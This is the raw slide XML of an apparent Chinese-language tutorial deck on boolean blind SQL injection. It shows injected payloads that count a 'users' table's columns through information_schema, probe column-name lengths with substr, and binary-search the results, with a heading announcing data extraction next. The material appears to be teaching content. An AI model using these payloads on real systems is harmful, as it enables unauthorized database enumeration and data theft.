                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>= ’users’)=1#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and (select count(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>= ’users’)=8 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示存在</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>个字段。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3636509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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="591989"/>
            <a:ext cx="11161240" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>接着挨个猜解字段名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>= ’users’ limit 0,1),1))=1 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>= ’users’ limit 0,1),1))=7 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示存在</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表的第一个字段为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>个字符长度。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>采用二分法，即可猜解出所有字段名。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2432931" y="5488533"/>
            <a:ext cx="8352928" cy="1308884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第五步：猜解表中数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>继续用二分法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="734292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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="952029"/>
            <a:ext cx="11161240" cy="5170646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第四步：猜解表中的字段名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>首先猜解表中字段的数量：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and (select count(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>= ’users’)=1#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1’ and (select count(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
